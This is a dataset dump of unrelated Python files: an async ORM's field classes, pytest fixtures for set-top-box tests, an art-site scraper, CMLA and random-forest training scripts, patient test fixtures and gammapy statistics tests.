= super().sanitize_data(value)\n if len(value) > self.max_length:\n raise FieldError(\n ('The string entered is bigger than '\n 'the \"max_length\" defined ({})'\n ).format(self.max_length)\n )\n return '\\'{}\\''.format(value)\n\n\nclass EmailField(CharField):\n\n def validate(self, value):\n super(EmailField, self).validate(value)\n # now validate the emailfield here\n email_regex = r'(^[\\w][\\w0-9_.+-]+@[\\w0-9-]+\\.[\\w0-9-.]+$)'\n if not re.match(email_regex, value):\n raise FieldError('\"{}\" not a valid email address'.format(value))\n\n\nclass JsonField(Field):\n internal_type = dict, list, str\n 
required_kwargs = ['max_length', ]\n creation_string = 'varchar({max_length})'\n args = ('db_column', 'default', 'max_length', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, max_length=0,\n null=False, choices=None, unique=False\n ):\n super().__init__(\n db_column=db_column, default=default,\n max_length=max_length, null=null, choices=choices,\n unique=unique\n )\n\n @classmethod\n def recompose(cls, value):\n return json.loads(value)\n\n def sanitize_data(self, value):\n self.validate(value)\n\n if value != 'NULL':\n if isinstance(value, str):\n try:\n value = json.loads(value)\n except JSONDecodeError:\n raise FieldError(\n 'The data entered can not be converted to json'\n )\n value = json.dumps(value)\n\n if len(value) > self.max_length:\n raise FieldError(\n ('The string entered is bigger than '\n 'the \"max_length\" defined ({})'\n ).format(self.max_length)\n )\n\n return '\\'{}\\''.format(value)\n\n\nclass NumberField(Field):\n pass\n\n\nclass IntegerField(NumberField):\n internal_type = int\n creation_string = 'integer'\n args = ('db_column', 'default', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, null=False, choices=None,\n unique=False):\n super().__init__(db_column=db_column, default=default, null=null,\n choices=choices, unique=unique)\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n\n return '{}'.format(value)\n\n\nclass DecimalField(NumberField):\n internal_type = (Decimal, float, int)\n creation_string = 'decimal({max_digits},{decimal_places})'\n args = ('db_column', 'default', 'null', 'choices', 'unique',\n 'max_digits', 'decimal_places')\n\n def __init__(self, db_column='', default=None, null=False, choices=None,\n unique=False, max_digits=10, decimal_places=2):\n super().__init__(db_column=db_column, default=default, null=null,\n choices=choices, unique=unique,\n max_digits=max_digits, decimal_places=decimal_places)\n\n def sanitize_data(self, value):\n 
value = super().sanitize_data(value)\n\n return '{}'.format(value)\n\n\nclass DateField(Field):\n internal_type = date\n creation_string = 'date'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%Y-%m-%d'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n\n return \"'{}'\".format(value)\n\n def serialize_data(self, value):\n return value.strftime(self.strftime)\n\n\nclass DateTimeField(DateField):\n internal_type = datetime\n creation_string = 'timestamp'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%Y-%m-%d %H:%s'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n\nclass TimeField(DateField):\n internal_type = time\n creation_string = 'time'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%H:%s'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n\nclass ForeignKey(Field):\n internal_type = int\n required_kwargs = ['foreign_key', ]\n creation_string = 'integer references {foreign_key}'\n args = ('db_column', 'default', 'foreign_key', 'null', 'unique')\n\n def __init__(self, db_column='', default=None, foreign_key='',\n null=False, unique=False):\n super().__init__(db_column=db_column, default=default,\n 
foreign_key=foreign_key, null=null, unique=unique\n )\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n return str(value)\n\n\nclass ManyToManyField(Field):\n internal_type = list, int\n required_kwargs = ['foreign_key', ]\n creation_string = '''\n {own_model} INTEGER REFERENCES {own_model} NOT NULL,\n {foreign_key} INTEGER REFERENCES {foreign_key} NOT NULL\n '''\n args = ('db_column', 'default', 'foreign_key', 'unique')\n\n def __init__(self, db_column='', foreign_key=None, default=None,\n unique=False):\n super().__init__(db_column=db_column, foreign_key=foreign_key,\n default=default, unique=unique\n )\n\n def creation_query(self):\n return self.creation_string.format(**self.__dict__)\n\n def validate(self, value):\n if isinstance(value, list):\n for i in value:\n super().validate(i)\n else:\n super().validate(value)\n","sub_path":"asyncorm/models/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":14958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468943739","text":"import logging\nimport pytest\nfrom retrying import retry\n\nlogger = logging.getLogger(__name__)\n\n\ndef pytest_addoption(parser):\n \"\"\"\n Adding an command line option to signal\n how many times the tests marked with this fixture\n should be executed.\n If not specified the tests will be executed once\n \"\"\"\n parser.addoption('--duration', action='store', default=300,\n help='The requested test duration')\n\n parser.addoption('--sleep_time', action='store', default=10,\n help='The requested sleep time')\n\n parser.addoption('--to-book', action='store', default=2,\n help='Number of future events to book')\n\n parser.addoption('--to-record', action='store', default=1,\n help='Number of current events to record')\n\n parser.addoption('--channels', action='store', default=3,\n help='Range of channels to scroll through')\n\n parser.addoption('--number', action='store', default=2,\n help='The 
nember of bookings/recordings/pb according to context')\n\n\n@pytest.fixture\ndef stability_params(request):\n params = {}\n params['duration'] = int(request.config.getoption(\"--duration\"))\n params['sleep_time'] = int(request.config.getoption(\"--sleep_time\"))\n params['number'] = int(request.config.getoption(\"--number\"))\n return params\n\n\n@pytest.fixture\ndef booking_params(request):\n return {\n 'to_book': int(request.config.getoption('--to-book')),\n 'to_record': int(request.config.getoption('--to-record')),\n 'channels': int(request.config.getoption('--channels')),\n }\n\n\n@pytest.fixture(scope='session')\ndef register2events(selenium, request):\n '''\n # /* Start transition to page - this is trigger by the use action\n # * milPageTransitionStart - Regular transition - the target page is known - Both page load and ctap are triggering\n # * milLateTransitionStart - Late transition - the target page will be taken from ctap result - only CTAP is triggering\n # * */\n # signal milPageTransitionStart( string page, string metadataUrl, var timestamp )\n # signal milLateTransitionStart( string metadataUrl, var timestamp )\n\n # /* CTAP */\n # signal milCtapStart( string method, string url, var timestamp )\n # signal milCtapFinish( string method, string url, string status, var timestamp )\n # /* This called after the model parsing and all model events occur - this useful to measure the model parsing and binding */\n # signal milCtapCallbackFinish( string method, string url, var timestamp )\n\n # /* Late navigation - target discovered from ctap response - page load is triggering */\n # signal milLateTransitionPageStart( string page, string metadataUrl, var timestamp )\n\n # /* The actual page is loaded - this indicate that the page was loading - but without the model*/\n # signal milPageLoaded( string page, var timestamp )\n # /* The page model was loaded */\n # signal milModelLoaded( string page, string metadataUrl, var timestamp )\n\n # /* The page Intro 
animation - start/finish -\n # * after the finish event the new page will get the focus */\n # signal milPageIntroStart( string page, string metadataUrl, var timestamp )\n # signal milPageIntroFinish( string page, string metadataUrl, var timestamp )\n\n # /* The previous pages outro animation start and finish\n # * after the finish event the old page will unloaded */\n # signal milPageOutroStart( string page, string metadataUrl, var timestamp )\n # signal milPageOutroFinish( string page, string metadataUrl, var timestamp )\n '''\n logger.info(\"Running fixture register2events\")\n selenium.register_keyevents()\n\n amp_events = [\"playing\", \"paused\", \"stopped\", \"EVENT_PRESENTATION_STATUS_FIRST_FRAME\", \"EVENT_PARENTAL_RATING_UNMUTE\", \"EVENT_PARENTAL_RATING_MUTE\"]\n milestones_events = [\"milPageTransitionStart\", \"milLateTransitionStart\", \"milCtapStart\", \"milCtapFinish\", \"milCtapCallbackFinish\", \"milLateTransitionPageStart\", \"milPageLoaded\", \"milModelLoaded\", \"milPageIntroStart\", \"milPageIntroFinish\", \"milPageOutroStart\", \"milPageOutroFinish\"]\n for amp_event in amp_events:\n selenium.register_videotag_event(amp_event)\n\n for mil_event in milestones_events:\n selenium.register_milestone_event(mil_event)\n\n # To ensure we don't play any VOD/DVR prior to tests starting\n def fin():\n selenium.unregister_keyevents()\n for amp_event in amp_events:\n selenium.unregister_videotag_event(amp_event)\n\n for mil_event in milestones_events:\n selenium.unregister_milestone_event(mil_event)\n request.addfinalizer(fin)\n\n\n@pytest.fixture(scope='function')\ndef set_syslog_debug(request, stb):\n logger.info(\"Running fixture 'set_syslog_debug'\")\n\n stb.set_syslog_hdd_level(7)\n\n\n@pytest.fixture(scope='function')\ndef set_syslog_info(request, stb):\n logger.info(\"Running fixture 'set_syslog_info'\")\n\n stb.set_syslog_hdd_level(6)\n\n\n@pytest.fixture(scope='function')\ndef back_to_live(selenium, request):\n @retry(stop_max_attempt_number=3, 
wait_fixed=1000)\n def finalyzer_test():\n logger.info(\"Enter on fixture: Back To Live\")\n current_src = selenium.get_video_src()\n logger.info(\"Back To Live INFO: Current URL = {}\".format(str(current_src)))\n if \".m3u8\" in current_src or \"dvr?\" in current_src:\n selenium.send_stop()\n current_src = selenium.get_video_src()\n assert \"rf\" in current_src\n logger.info(\"Back To Live Success = {}, url = {}\".format(str(\"rf\" in current_src), str(current_src)))\n logger.info(\"Exit from Back To Live. Current screen = {}\".format(str(selenium.get_current_screenname())))\n request.addfinalizer(finalyzer_test)\n","sub_path":"Learning/PCT/test_code/engineering_tests/infinitehome/pytest/vgw_tests/stb_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465827132","text":"import requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\nurl2 = \"https://artsandculture.google.com/asset/anne-in-a-striped-dress-fairfield-porter/TAHUTWNOPxdkYA\"\r\nreq2 = requests.get(url2)\r\nsoup2 = bs(req2.text, \"lxml\")\r\nim = \"https:\" + soup2.find_all(\"img\", class_=\"pmK5Xc\")[0][\"src\"] # img_link\r\ntd1 = soup2.find(\"section\", class_=\"rw8Th QwmCXd\")\r\ntd3 = td1.find_all(\"li\")\r\n# print(td3)\r\nd3 = {}\r\nfor i in range(len(td3)):\r\n if \"Title\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Title\"] = k\r\n if \"Creator\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Creator\"] = k\r\n if \"Location\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Location\"] = k\r\n if \"Medium\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Medium\"] = k\r\n if 
\"External Link\" in td3[i].find_all(\"span\")[0].text:\r\n a = td3[i].find_all(\"a\")\r\n d3[\"External Link\"] = a[0][\"href\"]\r\n\r\nprint(d3)\r\n# d3['Date created']=td3[2].contents[1]\r\n# d3['Location']=td3[3].contents[1]\r\n# d3['Medium']=td3[7].find_all('a')[0].text\r\nf7 = open(\"/Users/Lasitha/Documents/art_tweets/scraped_data/current_tweet.txt\", \"w+\")\r\nfor i in d3:\r\n f7.write(i + \":\" + d3[i] + \"\\n\")\r\nf7.close()\r\nresponse = requests.get(im)\r\nif response.status_code == 200:\r\n with open(\r\n \"/Users/Lasitha/Documents/art_tweets/scraped_data/imgs/current.jpg\", \"wb\"\r\n ) as f:\r\n f.write(response.content)\r\nprint(d3)\r\n","sub_path":"item_details.py","file_name":"item_details.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"377816382","text":"import os\nimport gensim\nimport numpy as np\nimport time\nimport string\n\nimport tensorflow\nprint('tensorflow.version=', tensorflow.__version__)\nif tensorflow.__version__.startswith('1.'):\n import tensorflow as tf\nelse:\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n\nfrom gensim.models.word2vec import LineSentence\nfrom cmlapp import CMLA\n\nall_words = {}\nwtf_words = {} \n\n\nclass Config(object):\n data_path = '../../data'\n embedding_path = '../../embedding'\n\n embedding_dim = 200\n attention_slice = 15\n gru_hidden_size = 30\n batch_size = 1\n num_layer = 2\n learning_rate = 0.0007\n drop_rate = 0.5\n max_grad_norm = 5\n\n max_iter = 5\n statistic_step = int(max_iter * 0.1) if int(max_iter * 0.1) > 0 else 2\n test_batch_size = 128\n\n ckpt_path = 'ckpts'\n if not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n \n \ndef load_doc_to_vecs(path, embedding_file):\n model = gensim.models.Word2Vec.load(embedding_file)\n lines = open(path).read().split('\\n')\n vecs = []\n\n for line in lines:\n line = line.translate(string.punctuation)\n words = line.split(' ')\n 
line_vecs = []\n for word in words:\n if word not in all_words:\n all_words[word] = ''\n if word in model:\n line_vecs.append(model[word])\n else:\n line_vecs.append(np.zeros(config.embedding_dim))\n if word not in wtf_words:\n wtf_words[word] = ''\n vecs.append(line_vecs)\n return vecs, lines\n\n\ndef load_label_to_vecs(path):\n lines = open(path).read().split('\\n')\n vecs = []\n for line in lines:\n labels = line.split(' ')\n vecs.append(labels)\n return vecs\n\n\ndef train_d2v_model(infile, embedding_file):\n model = gensim.models.Word2Vec(LineSentence(infile), size=200, window=5, min_count=5)\n model.save(embedding_file)\n\n\nif __name__ == '__main__':\n config = Config()\n \n print('(1) load data and trans to vecs...')\n embedding_file = os.path.join(config.embedding_path, 'yelp.vector.bin')\n if not os.path.exists(embedding_file):\n train_d2v_model(os.path.join(config.data_path, 'train_docs.txt'), embedding_file)\n print('embedding_file not exist and then trained')\n \n x_train, x_docs = load_doc_to_vecs(os.path.join(config.data_path, 'train_docs.txt'), embedding_file)\n y_train_a = load_label_to_vecs(os.path.join(config.data_path, 'train_labels_a.txt'))\n y_train_p = load_label_to_vecs(os.path.join(config.data_path, 'train_labels_p.txt'))\n x_train = np.array(x_train)\n\n x_test, x_docs_test = load_doc_to_vecs(os.path.join(config.data_path, 'test_docs.txt'), embedding_file)\n y_test_a = load_label_to_vecs(os.path.join(config.data_path, 'test_labels_a.txt'))\n y_test_p = load_label_to_vecs(os.path.join(config.data_path, 'test_labels_p.txt'))\n x_test = np.array(x_test)\n\n print('there are ' + str(len(all_words))+' words totally')\n print('there are ' + str(len(wtf_words))+' words not be embeded')\n print('train docs:' + str(len(x_train)), 'train labels of aspect:' + str(len(y_train_a)), 'train labels of opinion:' + str(len(y_train_p)))\n print('test docs:' + str(len(x_test)), 'test labels of aspect:' + str(len(y_test_a)), 'test labels of opinion:' + 
str(len(y_test_p)))\n \n\n print('(2) build model...')\n model = CMLA(config=config)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1000)\n \n\n print('(3) train model...')\n with tf.Session() as sess:\n # merged = tf.summary.merge_all()\n #tf.summary.FileWriter('graph', sess.graph)\n sess.run(tf.global_variables_initializer())\n \n start = time.time()\n new_state = sess.run(model.gru_init_state)\n total_loss = 0\n less_loss = 10000.0\n for epoch in range(config.max_iter):\n for i in range(len(x_train)):\n feed_dict = {model.x: x_train[i], model.y1: y_train_a[i], model.y2: y_train_p[i]}\n for ii, dd in zip(model.gru_init_state, new_state):\n feed_dict[ii] = dd\n\n loss, new_state, _ = sess.run([model.loss, model.gru_final_state, model.optimizer], feed_dict=feed_dict)\n total_loss += loss\n end = time.time()\n\n if loss < less_loss:\n model_file = os.path.join(config.ckpt_path, \"cmla_tf_{}-{}-{}.th\".format(epoch, i, loss))\n saver.save(sess, model_file, global_step=epoch)\n print('epoch:' + str(epoch), 'steps:' + str(i), 'model_file=', model_file)\n less_loss = loss\n\n if i % config.statistic_step == 0:\n ave_loss = total_loss\n if i > 0:\n ave_loss = total_loss / config.statistic_step\n print('epoch:' + str(epoch) + ' / ' + str(config.max_iter), 'steps: ' + str(i),\n 'cost_time:' + str(end - start), 'loss:' + str(ave_loss))\n\n total_loss = 0\n correct_a_num = 0\n correct_p_num = 0\n for index in range(config.test_batch_size):\n feed_dict[model.x] = x_train[index]\n feed_dict[model.y1] = y_train_a[index]\n feed_dict[model.y2] = y_train_p[index]\n correct_a, correct_p = sess.run([model.correct_a, model.correct_p], feed_dict=feed_dict)\n if correct_a:\n correct_a_num += 1\n if correct_p:\n correct_p_num += 1\n score1 = float(correct_a_num) * 100 / config.test_batch_size\n score2 = float(correct_p_num) * 100 / config.test_batch_size\n print('Train epoch:' + str(epoch), 'steps:' + str(i), 'precision: ' + str(score1) + ' ' + str(score2))\n\n 
correct_a_num = 0\n correct_p_num = 0\n test_batch_size = len(x_test)\n for index in range(test_batch_size):\n feed_dict[model.x] = x_test[index]\n feed_dict[model.y1] = y_test_a[index]\n feed_dict[model.y2] = y_test_p[index]\n correct_a, correct_p = sess.run([model.correct_a, model.correct_p], feed_dict=feed_dict)\n if correct_a:\n correct_a_num += 1\n if correct_p:\n correct_p_num += 1\n score1 = float(correct_a_num) * 100 / config.test_batch_size\n score2 = float(correct_p_num) * 100 / config.test_batch_size\n print('Test epoch:' + str(epoch), 'steps:' + str(i), 'precision: ' + str(score1) + ' ' + str(score2))\n","sub_path":"opinion_extraction/CMLA/tf/train_cmla.py","file_name":"train_cmla.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128340321","text":"import random\nimport sys\nfrom sklearn.preprocessing import StandardScaler\n\nfrom NN.window import build_array_skytem\n\nsys.path.insert(0, '../utilities')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom utilities.data_reader import load_data2, remove_edge\nfrom utilities.calc_metrics import metrics\nimport utilities.data_visualize as dv\nimport utilities.difference\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef rnd_forest2(timestamp_val, dbdt, lbl, X_valOG, X_train, X_val,\n y_train, y_val, n_trees = 100):\n\n print(\"Training size: \", X_train.shape[0])\n print(\"Val size: \", X_val.shape[0])\n #Create Model\n classifier = RandomForestClassifier(n_estimators=n_trees, max_features=None)\n\n #Train\n classifier.fit(X_train, y_train)\n\n #Predict\n y_scor = classifier.predict_proba(X_val)\n\n #find misclassified samples\n y_pred = y_scor[:, 1] >= 0.8\n misclassified = np.where(y_val != y_pred)\n corclassified = np.where(y_val == y_pred)\n\n #plot data and red 
bars where data is misclassified\n # plt.figure(\"Soundings\")\n # timestamp = timestampToTime(timestamp)\n\n dv.plot_misclassified(timestamp_val, X_valOG, y_val, y_pred)\n # utilities.data_visualize.plotDat(timestamp, dbdt, lbl)\n # plt.yscale('log')\n # timestamp = timestamp - timestamp[0]\n # for xc in misclassified[0]:\n # ogmark = timestamp[test_idx[xc]]\n # plt.axvline(x=ogmark, color = 'red')\n\n # #plot correctly classified\n # for xc in corclassified[0]:\n # ogmark = timestamp[X_test_idx[xc]]\n # plt.axvline(x=ogmark, color = 'blue')\n\n\n #metrics\n report, CM, ACC, AUC = metrics(y_val, y_scor[:,1], y_pred)\n return y_scor[:,1], classifier.feature_importances_, report, ACC, AUC, CM\n\ndef main():\n ## Data preprocessing\n fname0 = \"../data/stendalmark_20181120_RAW_export.xyz\"\n fname1 = \"../data/stendalmark_20181121_RAW_export.xyz\"\n\n df, dbdt, lbl, timestamp, gtimes = load_data2(fname0, 8, 24)\n dbdt, lbl, timestamp = remove_edge(timestamp, dbdt, lbl, 20)\n timestamp = (timestamp - timestamp[0]) * 10 ** 5\n\n df0, dbdt0, lbl0, timestamp0, gtimes0 = load_data2(fname1, 8, 24)\n dbdt0, lbl0, timestamp0 = remove_edge(timestamp0, dbdt0, lbl0, 20)\n timestamp0 = (timestamp0 - timestamp0[0]) * 10 ** 5 + timestamp[-1] + 0.7\n\n dbdt = np.concatenate((dbdt, dbdt0));\n lbl = np.concatenate((lbl, lbl0))\n timestamp = np.concatenate((timestamp, timestamp0))\n sc = StandardScaler()\n\n r = int(np.ceil(0.8 * dbdt.shape[0]))\n dbdt = dbdt[0:r, :]\n lbl = lbl[0:r]\n timestamp=timestamp[0:r]\n idx = range(0, dbdt.shape[0])\n v = int(np.ceil(0.8 * dbdt.shape[0]))\n X_test = dbdt[v:, :]\n X_train = dbdt[0:v, :]\n y_train = lbl[0:v]\n y_test = lbl[v:]\n idx_train = list(idx[0:v])\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n\n # X_train = build_array_skytem(41, X_train)\n # X_test = build_array_skytem(41, X_test)\n # y_score, _, report, acc = rnd_forest2(timestamp, dbdt, lbl, idx[r:],\n # X_train.T, X_test.T,\n # y_train[20:-20], 
y_test[20:-20], n_trees=100)\n\n # trees = range(1,100)\n trees = np.linspace(0.01,1.0, 50)\n metric = np.zeros((len(trees),))\n for i, n_trees in enumerate(trees):\n # random.shuffle(idx_train)\n n = int(np.ceil(n_trees * X_train.shape[0]))\n _, _, report, acc, auc, CM = rnd_forest2(timestamp[v:], dbdt, lbl, X_test,\n X_train[idx_train[0:n],:], X_test,\n y_train[idx_train[0:n]], y_test, n_trees=100)\n metric[i] = CM[1,0] + CM[0,1]\n plt.figure()\n plt.close('all')\n print(\"Iteration: \", i)\n plt.plot(trees, metric)\n plt.ylabel(\"Total errors\")\n plt.xlabel(\"Training set in use [Fraction]\")\n plt.show()\n\n\nif __name__ == '__main__':\n main()","sub_path":"SVM/rndForest2.py","file_name":"rndForest2.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69239739","text":"from datetime import datetime\n\n\ndef create_treatment_arm(trtmt_id, version, pats_assigned=5, max_pats_allowed=35, gene='NF1', status='OPEN',\n assay_results=None):\n \"\"\"\n Returns a dict containing a simplified representation of a treatment arm for the currentTreatmentArm\n of the Patient model.\n \"\"\"\n return {\n '_id': trtmt_id,\n 'version': version,\n 'numPatientsAssigned': pats_assigned,\n 'maxPatientsAllowed': max_pats_allowed,\n 'gene': gene,\n 'treatmentArmStatus': status,\n 'assayResults': assay_results if assay_results is not None else [],\n }\n\n\ndef create_patient(pat_seq_num, status, gender=\"Male\", curr_step_num = 0, trtmt_arm=None, diseases=None, other=None):\n \"\"\"\n Returns a dict containing a simplified representation of a patient in the Patient model.\n \"\"\"\n if diseases is None:\n diseases = []\n pat = {\n # '_id': int(pat_seq_num),\n 'patientSequenceNumber': pat_seq_num,\n 'gender': gender,\n 'currentPatientStatus': status,\n 'currentStepNumber': curr_step_num,\n 'diseases': diseases,\n }\n if trtmt_arm is not None:\n pat['currentTreatmentArm'] = trtmt_arm\n if 
other:\n for field_name, data in other.items():\n pat[field_name] = data\n return pat\n\n\ndef create_patient_variant(identifier, gene=None, chromosome=None, protein=None, allele_freq=None, ovc=None,\n copy_num=None, funct=None, transcript=None, hgvs=None, position=None, exon=None,\n rare=None, location=None, annotation=None):\n \"\"\"\n Creates and returns a single variant as it might appear in the Patient collection.\n \"\"\"\n patient_variant = {\n 'identifier': identifier,\n }\n # The following are fields that are relevant to Mois, but may or may not be present:\n if gene is not None:\n patient_variant['gene'] = gene\n if chromosome is not None:\n patient_variant['chromosome'] = chromosome\n if copy_num is not None:\n patient_variant['copyNumber'] = copy_num\n if protein is not None:\n patient_variant['protein'] = protein\n if funct is not None:\n patient_variant['function'] = funct\n if hgvs is not None:\n patient_variant['hgvs'] = hgvs\n if allele_freq is not None:\n patient_variant['alleleFrequency'] = allele_freq\n if ovc is not None:\n patient_variant['oncomineVariantClass'] = ovc\n if transcript is not None:\n patient_variant['transcript'] = transcript\n if position is not None:\n patient_variant['position'] = position\n if exon is not None:\n patient_variant['exon'] = exon\n if rare is not None:\n patient_variant['rare'] = rare\n if location is not None:\n patient_variant['location'] = location\n if annotation is not None:\n patient_variant['annotation'] = annotation\n\n return patient_variant\n\n\ndef create_variant_report(created_date=datetime.now()):\n \"\"\"\n Creates and returns an empty patient variant report with the six required variant lists to be used in testing.\n \"\"\"\n pat_var_rpt = {\n 'singleNucleotideVariants': [],\n 'copyNumberVariants': [],\n 'indels': [],\n 'geneFusions': [],\n 'unifiedGeneFusions': [],\n 'nonHotspotRules': [],\n 'createdDate': created_date,\n }\n return pat_var_rpt\n\n\ndef create_assay_msg(biomarker, result=None, 
reported_date=None, ordered_date=None):\n \"\"\"\n Creates and returns a minimalistic assay message for patient model.\n \"\"\"\n assay_msg = {'biomarker': biomarker}\n if result:\n assay_msg['result'] = result\n if reported_date:\n assay_msg['reportedDate'] = reported_date\n if ordered_date:\n assay_msg['orderedDate'] = ordered_date\n return assay_msg\n\n\n# Constants for treatment arm assay results\nTA_PTEN_ASSAY = {\n \"gene\" : \"PTEN\",\n \"assayResultStatus\" : \"POSITIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 3.0\n}\nTA_MSH2_ASSAY = {\n \"gene\" : \"MSH2\",\n \"assayResultStatus\" : \"POSITIVE\",\n \"assayVariant\" : \"NEGATIVE\",\n \"levelOfEvidence\" : 4.0\n}\nTA_MLH1_ASSAY = {\n \"gene\" : \"MLH1\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"EMPTY\",\n \"levelOfEvidence\" : 5.0\n}\nTA_RB_ASSAY = {\n \"gene\" : \"RB\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 6.0\n}\nTA_RB_ASSAY2 = {\n \"gene\" : \"rb\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 7.0\n}\n","sub_path":"tests/patient_data.py","file_name":"patient_data.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550888748","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nimport pytest\nfrom numpy.testing import assert_allclose\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom regions import CircleSkyRegion\nfrom gammapy.data import DataStore, Observations, ObservationStats\nfrom gammapy.spectrum import ReflectedRegionsBackgroundEstimator\nfrom gammapy.utils.testing import requires_data\n\n\n@pytest.fixture(scope=\"session\")\ndef observations():\n data_store = DataStore.from_dir(\"$GAMMAPY_DATA/hess-dl3-dr1/\")\n run_list = [23523, 23526]\n return Observations([data_store.obs(_) for _ in 
run_list])\n\n\n@pytest.fixture(scope=\"session\")\ndef on_region():\n pos = SkyCoord(83.63 * u.deg, 22.01 * u.deg)\n on_size = 0.3 * u.deg\n return CircleSkyRegion(pos, on_size)\n\n\n@pytest.fixture(scope=\"session\")\ndef bad_on_region():\n pos = SkyCoord(83.6333 * u.deg, 21.5144 * u.deg)\n on_size = 0.3 * u.deg\n return CircleSkyRegion(pos, on_size)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats(on_region, observations):\n obs = observations[0]\n bge = ReflectedRegionsBackgroundEstimator(on_region=on_region, observations=obs)\n bg = bge.process(obs)\n return ObservationStats.from_observation(obs, bg)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_bad_on_region(bad_on_region, observations):\n obs = observations[0]\n bge = ReflectedRegionsBackgroundEstimator(on_region=bad_on_region, observations=obs)\n bg = bge.process(obs)\n return ObservationStats.from_observation(obs, bg)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_stacked(on_region, observations):\n bge = ReflectedRegionsBackgroundEstimator(\n on_region=on_region, observations=observations\n )\n bge.run()\n\n return ObservationStats.stack(\n [\n ObservationStats.from_observation(obs, bg)\n for obs, bg in zip(observations, bge.result)\n ]\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_stacked_bad_on_region(bad_on_region, observations):\n bge = ReflectedRegionsBackgroundEstimator(\n on_region=bad_on_region, observations=observations\n )\n bge.run()\n\n return ObservationStats.stack(\n [\n ObservationStats.from_observation(obs, bg)\n for obs, bg in zip(observations, bge.result)\n ]\n )\n\n\n@requires_data()\nclass TestObservationStats:\n @staticmethod\n def test_str(stats):\n text = str(stats)\n assert \"Observation summary report\" in text\n\n @staticmethod\n def test_to_dict(stats):\n data = stats.to_dict()\n assert data[\"n_on\"] == 425\n assert data[\"n_off\"] == 406\n assert_allclose(data[\"alpha\"], 0.333, rtol=1e-2)\n assert_allclose(data[\"sigma\"], 16.136, rtol=1e-3)\n 
